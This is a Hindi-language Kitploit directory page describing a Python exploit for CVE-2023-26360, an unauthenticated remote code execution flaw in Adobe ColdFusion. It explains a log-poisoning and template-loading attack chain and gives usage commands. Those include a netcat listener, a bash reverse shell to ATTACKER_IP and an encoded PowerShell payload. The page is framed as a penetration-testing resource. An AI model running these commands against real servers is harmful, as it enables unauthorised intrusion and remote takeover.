Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Adobe_ColdFusion_RCE_Unauthenticated — यह एक्सप्लॉइट CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) पर आधारित है और इसे Metasploit मॉड्यूल तथा jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit के आधार पर निर्मित किया गया है। | Kitploit
उपकरण/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

यह एक्सप्लॉइट CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) पर आधारित है और इसे Metasploit मॉड्यूल तथा jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit के आधार पर निर्मित किया गया है।

रिपॉजिटरी देखें
113 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-26360 — Adobe ColdFusion बिना प्रमाणीकरण के RCE

CVE-2023-26360 के लिए दूरस्थ कोड निष्पादन शोषण का Python कार्यान्वयन, मूल Metasploit module के विश्लेषण और jakabakos के पूर्व कार्य पर आधारित।

यह क्यों मौजूद है

jakabakos का PoC <cfexecute> को सीधे _variables पैरामीटर में इंजेक्ट करने और एक ही चरण में ColdFusion लॉग से आउटपुट पढ़ने का प्रयास करता है। यह दृष्टिकोण विफल हो जाता है क्योंकि ColdFusion उस संदर्भ में CFML टैग का इनलाइन मूल्यांकन नहीं करता है, जिसके परिणामस्वरूप बिना कोड निष्पादन के 500 त्रुटि होती है।

यह कार्यान्वयन Metasploit मॉड्यूल द्वारा उपयोग किए गए सही दो-चरणीय तंत्र को दोहराता है:

  1. लॉग विषाक्तीकरण — कमजोर CFC एंडपॉइंट पर एक दूषित _variables पेलोड ({<cftry>CFML</cftry>) भेजता है। ColdFusion इसे पार्स करने में विफल रहता है और कच्ची सामग्री — जिसमें CFML कोड भी शामिल है — को में लिखता है।
coldfusion-out.log
  • टेम्पलेट निष्पादन — क्लासनेम डिसीरियलाइज़ेशन भेद्यता का उपयोग करके विषाक्त लॉग फ़ाइल को ColdFusion टेम्पलेट के रूप में लोड करता है, जिससे सर्वर इंजेक्ट किए गए CFML को निष्पादित करता है।
  • कमांड निष्पादन createObject के माध्यम से java.lang.Runtime.exec() के द्वारा किया जाता है, जो <cfexecute> पर किसी भी निर्भरता से बचाता है, जो आमतौर पर सख्त या उत्पादन परिनियोजन में अक्षम होता है।

    प्रभावित संस्करण

    • Adobe ColdFusion 2021 अपडेट 5 और पहले के
    • Adobe ColdFusion 2018 अपडेट 15 और पहले के

    आवश्यकताएँ

    root@kitploit:~
    pip install -r requirements.txt
    

    उपयोग

    शोषण चलाने से पहले एक लिसनर प्रारंभ करें:

    root@kitploit:~
    nc -lvnp 4444
    

    Windows लक्ष्य:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"
    

    Linux लक्ष्य:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
    

    प्रॉक्सी के माध्यम से (जैसे Burp Suite):

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080
    

    विकल्प

    फ़्लैगविवरण
    --hostलक्ष्य आधार URL (जैसे http://192.168.1.10:8500)
    --cmdलक्ष्य पर निष्पादित करने का आदेश
    --winयदि लक्ष्य Windows होस्ट है तो यह फ़्लैग सेट करें
    --proxyवैकल्पिक HTTP प्रॉक्सी URL

    यह कैसे काम करता है

    root@kitploit:~
    ┌─────────────┐         Step 1: plant CFML          ┌──────────────────┐
    │   Attacker  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
    │             │      CF fails to parse, logs CFML     │                  │
    │             │                                       │ coldfusion-      │
    │             │         Step 2: trigger execution     │ out.log          │
    │             │ ──── POST classname=X..\logs\cf... ──► (loaded as       │
    │             │                                       │  CFML template)  │
    │  Listener   │ ◄─────────────── reverse shell ───────│                  │
    └─────────────┘                                       └──────────────────┘
    

    संदर्भ

    • Adobe सुरक्षा सलाहकार
    • Rapid7 विश्लेषण — AttackerKB
    • Metasploit मॉड्यूल
    • jakabakos PoC

    अस्वीकरण

    यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा मूल्यांकन (पेनिट्रेशन टेस्ट, CTF, प्रयोगशाला वातावरण) के लिए प्रदान किया जाता है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस शोषण को चलाना अवैध है। लेखक किसी भी दुरुपयोग के लिए कोई देयता नहीं लेता है।

    टूल डाउनलोड करें